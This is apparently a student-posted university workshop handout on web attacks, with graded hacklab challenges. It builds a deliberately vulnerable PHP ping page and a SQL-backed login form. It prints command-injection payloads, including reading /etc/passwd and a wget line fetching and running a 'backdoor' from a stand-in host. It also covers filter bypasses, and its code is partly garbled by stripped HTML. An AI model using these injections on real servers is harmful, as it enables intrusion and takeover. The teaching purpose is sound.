this is my Assignment


Important: As usual, please write details of what you did to get full points. 1. (0.5 point) Go to http://10.8.0.240/agent.php (Links to an external site.) to get the secret * 2. (0.5 point) Go to http://10.8.0.240/admin.php (Links to an external site.) to get the secret * 3. (0.5 point) Go to http://10.8.0.240/method.php (Links to an external site.) to get the secret * 4. (0.5 point) Go to http://10.8.0.240/help.php (Links to an external site.) to get the secret * 5. (1.0 point) Go to http://10.8.0.240/login.php (Links to an external site.) to get the secret ** 6. (1.0 point) Go to http://10.8.0.240/superhero.php (Links to an external site.) to get the secret ** 7. (2.0 point) Go to http://10.8.0.240/guess.php (Links to an external site.) to get the secret *** 8. (1.0 point) Go to http://10.8.0.240:81/ping.php (Links to an external site.) to get the secret ** 9. (2.0 point) Go to http://10.8.0.240:82/doa.php (Links to an external site.) to get the secret **** 10. (1.0 point) Go to http://10.8.0.240:83/fortune.php (Links to an external site.) to get the secret ** Notes & Hints: · You have to be connected to the Hacklab VPN to access these pages · The * indicates the difficulty of the puzzle · Q5 and Q6 (login and superheroes questions) - Please solve these manually, and DO NOT use sqlmap! I have added a 0.5sec sleep() on PHP to discourage sqlmap... · Q7 You can use sqlmap or if you prefer, your own script · Note that port number for Q8,9,10 (there is a reason why I am running these on separate containers...) Overview and Objectives In this workshop, we will start to look at attacking and defending web-based applications.  · Part 1 (this week) - command injection and SQL injection attacks · Part 2 (next week) - cross-site scripting (XSS), cross-site request forgery (CSRF), etc. Simple command injection example 1. In your Kali Linux instance, start Apache2 as follows (Note that systemctl ends with the letter "l" rather than the integer "1") a1112407@kali:~$ sudo systemctl start apache2 a1112407@kali:~$ sudo systemctl enable apache2 2. Check that the default page is accessible via firefox (http://localhost (Links to an external site.)). You might see something different if you did Workshop 0x07. 3. Enable PHP error message to help debugging in case you make typos (without this setting, PHP just shows a blank page when there is an error... not very friendly). a1112407@kali:~$sudo sed -i -e '/display_errors =/ s/= .*/= on/' /etc/php/7.3/apache2/php.ini 4. Create a .PHP file with the following code and save under /var/www/html as ping.php. This is a simple online PHP page that pings host for you (there are real services like this; e.g., https://www.site24x7.com/ping-test.html (Links to an external site.)). 5. 6.

Welcome to the Ping Server

7. 8.

9. IP:

10.

11.

12. 13. 14. {$cmd}"); 19. } 20. ?> ​ 21. Test the PHP from Firefox to see how it works. NOTE: if you are failing to get the PHP code to run, check the following: (1) check that the PHP have permission 755 (or just chmod o+r) (2) check that PHP is enable (#a2enmod php7.3) (3) restart apache 2 just in case (#systemctl restart apache2) 22. The PHP code, simple as it is, has a serious flaw. What happens when you submit these values in the form? 127.0.0.1; ls / or 127.0.0.1; cat /etc/passwd or 127.0.0.1; wget https://bad_server/backdoor; (Links to an external site.) backdoor 4444  I hope you get the idea! Arbitrary code execution and with minimum effort an adversary can have full control of the web server! The attack takes advantage of the fact you can execute multiple shell commands by using ";". 23. (Naive input filter) Suppose you modify the PHP code slightly to escape the ";" character by adding this line in the PHP code: $ip = preg_replace("/;/","",$ip); You can still get around this filter by using other methods (&, &&, ||) to pass multiple commands to the shell, so this is clearly not enough to prevent command injection attacks. Client-Side Validation 1. With HTML5 you can implement simple client-side validation using the "pattern" attribute using regex in the input tag, along with "title" like this,  IP:
​ When you enter an injection attack you get this error: 2. Now that the attacker is only able to submit IPv4 dot format? Unfortunately, client-side validation can easily be overcome. The simplest way is to reload, hit F12 to enter developer mode, and get rid of the "pattern" attribute! Server-Side Validation The most secure way is to implement a more white-list type user input validation on the server side like this, using the PHP regex matching function, preg_match. if (preg_match("/^([0-9]{1,3}\.){3}[0-9]{1,3}$/", $ip)) { $cmd = shell_exec('ping -c 4 ' . $ip); print("

{$cmd}

"); } else { print("Invalid IPv4 format!"); } The best practice is to do both client-side (for better UX) and server-side (to prevent attacks) validation. Here is the final code for the ping server. Please test on your local instance - attack with all your might, and make sure it's unbreakable!!

Welcome to the Ping Server

IP:

{$cmd}"); } else { print("Invalid IPv4 format!"); } } ?>   SQL Injection - Building a Simple Dynamic Server To appreciate SQL injection, let's build a simple dynamic web server that queries data from a MySQL database. Kali has MariaDB (MySQL) installed by default. You just have to start it, login as "root" to begin. 1. In Kali, start MySQL and login as root as follows: a1112407@kali:$sudo systemctl start mysql a1112407@kali:$sudo mysql Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 38 Server version: 10.3.12-MariaDB-2 Debian buildd-unstable Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> 2. Create a new database called "workshop8" MariaDB [(none)]> create database workshop8; Query OK, 1 row affected (0.001 sec) 3. Create a new user "dbuser" and add all privileges to the newly created database. Feel free to change password to a better one... MariaDB [(none)]> grant all privileges on workshop8.* to 'dbuser'@'localhost' identified by 'password123'; Query OK, 0 rows affected (0.000 sec) 4. Quit once by typing in "quit", then re-login as the newly-created dbuser a1112407@kali:$ mysql -u dbuser -p -D workshop8 5. Using the "create table" SQL statement, create a new table called "students" with fields "id", "name", "password", and "grade". MariaDB [workshop8]> create table students (id INT NOT NULL AUTO_INCREMENT, name VARCHAR(40) NOT NULL, password VARCHAR(40) NOT NULL, grade VARCHAR(2) NOT NULL, PRIMARY KEY (id)); You can list current tables in the database and it's schema as follows: MariaDB [workshop8]> show tables; +---------------------+ | Tables_in_workshop8 | +---------------------+ | students | +---------------------+ 1 row in set (0.000 sec) MariaDB [workshop8]> describe students; +----------+-------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +----------+-------------+------+-----+---------+----------------+ | id | int(11) | NO | PRI | NULL | auto_increment | | name | varchar(40) | NO | | NULL | | | password | varchar(40) | NO | | NULL | | | grade | varchar(2) | NO | | NULL | | +----------+-------------+------+-----+---------+----------------+ 4 rows in set (0.004 sec) 6. Insert some dummy data using the "insert" SQL statement. Note: we have used SHA1 for simplicity for hashing passwords, but as we learnt in the cryptography class, this IS NOT a secure way to store password, as it is prone to offline attacks. insert into students (name, password, grade) values ('Ryoma', sha1('password123'), 'A'); insert into students (name, password, grade) values ('Kaoru', sha1('pretzels'), 'B'); insert into students (name, password, grade) values ('Higa', sha1('princeoftennis'), 'F'); You can confirm the list of students with the SQL statement "select * from students;" or query particular students with "select * from students where grade='F'", etc. MariaDB [workshop8]> select * from students where grade='F'; +----+------+------------------------------------------+-------+ | id | name | password | grade | +----+------+------------------------------------------+-------+ | 3 | Higa | e7e363b9881f8dbcc52e877b496533aa49c20a6d | F | +----+------+------------------------------------------+-------+ 1 row in set (0.000 sec) 7. Now create this simple login PHP form (or download from here. The PHP file shows a login form if there is no active session, and just shows some user info if there is an active session. 8. 9. query($sql)) { 23. if ($res->num_rows > 0) { 24. $row = $res->fetch_assoc(); 25. $_SESSION['id'] = $row['id']; 26. $_SESSION['name'] = $row['name']; 27. $_SESSION['grade'] = $row['grade']; 28.